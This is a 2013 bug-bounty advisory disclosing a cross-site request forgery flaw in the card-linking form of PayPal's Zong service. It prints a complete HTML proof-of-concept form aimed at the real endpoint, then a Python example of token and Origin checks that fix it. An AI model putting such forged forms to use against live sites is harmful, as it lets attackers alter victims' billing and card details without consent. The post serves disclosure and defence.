PayPal service Zong Update Credit Card & Billing Information CSRF

March 12, 2013

Vendor product brief information: Zong aims to bring frictionless mobile payments to the world. Zong processes millions of payments a month in over 40 countries worldwide.

CSRF Vulnerable URL: https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink

CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated (OWASP). The creditCardLink form below accepts a POST with no anti-CSRF token, so a page on any other origin can submit it on behalf of a logged-in user.

POC:

<!-- Cross-site copy of the Zong card-linking form; the only hidden fields are consumer_id and is_update, neither of which is a secret. -->
<form action="https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink" method="post" name="manageCreditCardForm" id="manageCreditCardForm">
<input type="hidden" name="consumer_id" value="10053353027" id="consumer_id">
<input type="hidden" name="is_update" value="false" id="is_update">

<label for="billing_first_name">First name </label>

<input type="text" class="text required" id="billing_first_name" name="billing_first_name" value="sandeep">
<label for="billing_last_name">Last name</label>
<input type="text" class="text required" id="billing_last_name" name="billing_last_name" value="kamble">
<label for="billing_card_type">Card type</label>
<select name="billing_card_type" class="select1" id="billing_card_type">
<option value="Visa">Visa</option>
<option value="MasterCard">MasterCard</option>
<option value="AmericanExpress">American Express</option>
<option value="Discover">Discover</option>
</select>

<label for="billing_card_number">Card number</label>

<input type="text" class="text required" id="billing_card_number" name="billing_card_number" value="442411000016">

<label for="billing_exp_month">Expiration date</label>
<select name="billing_exp_month" class="select2" id="billing_exp_month">
<option value="-1">Month</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select>
<select name="billing_exp_year" class="select2" id="billing_exp_year">
<option value="-1">Year</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
<option value="2017">2017</option>
<option value="2018">2018</option>
<option value="2019">2019</option>
<option value="2020">2020</option>
<option value="2021">2021</option>
<option value="2022">2022</option>
<option value="2023">2023</option>
</select>

<label for="billing_cvv">Security code</label>
<input type="text" class="cvv required" id="billing_cvv" maxlength="4" name="billing_cvv" value="">
<!-- The submit button name/value (_eventId_continue=continue) is what the server keys on to process the form. -->
<button type="submit" id="_eventId_continue" name="_eventId_continue" value="continue" class="enterBtn"><span>Link Card</span></button>
</form>

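The fix that closes this class of bug is a server-side check the PoC form cannot satisfy: a per-session synchronizer token embedded in the real form, compared in constant time, plus an Origin/Referer check against the site's own origin. The code below is an added illustration written for this post, not Zong's or PayPal's code; the field name csrf_token, the session dict and the attacker origin are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origin that legitimately hosts the creditCardLink form (from the advisory URL).
TRUSTED_ORIGIN = "https://my.zong.com"


def issue_csrf_token(session):
    """Generate a per-session synchronizer token and store it server-side.

    The real form must carry it as a hidden field (csrf_token here, an assumed
    name). A page on another origin cannot read that field, so it cannot
    build a POST that passes is_csrf_safe()."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_csrf_safe(session, form, headers):
    """Accept the POST only if the token matches and, when the browser sends
    Origin or Referer, the request originates from TRUSTED_ORIGIN."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    # Constant-time compare; a missing token (the PoC above) fails here.
    if not expected or not hmac.compare_digest(expected, submitted):
        return False
    origin = headers.get("Origin")
    if origin is None and headers.get("Referer"):
        parts = urlsplit(headers["Referer"])
        origin = f"{parts.scheme}://{parts.netloc}"
    # Some older browsers send neither header; the token check still protects.
    return origin is None or origin == TRUSTED_ORIGIN


def demo():
    """Constructed requests: the cross-site PoC submission vs. a legitimate one."""
    session = {}
    token = issue_csrf_token(session)
    poc_form = {"consumer_id": "10053353027", "is_update": "false",
                "_eventId_continue": "continue"}          # no csrf_token field
    poc_headers = {"Origin": "https://attacker.example"}  # constructed origin
    legit_form = dict(poc_form, csrf_token=token)
    legit_headers = {"Origin": TRUSTED_ORIGIN}
    return {
        "poc_cross_site": is_csrf_safe(session, poc_form, poc_headers),
        "legit_same_site": is_csrf_safe(session, legit_form, legit_headers),
        # Correct token but wrong origin: still rejected (defense in depth).
        "stolen_token_cross_site": is_csrf_safe(session, legit_form, poc_headers),
    }
```

Setting the session cookie with SameSite=Lax or Strict adds a browser-side layer on top of this check, but the token remains the primary control.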

Thanks to PP for such a good bounty program and to the PP security team for fixing the bug quickly :) .
Special thanks to my G4H team.

–[S]

We Provide Penetration Testing
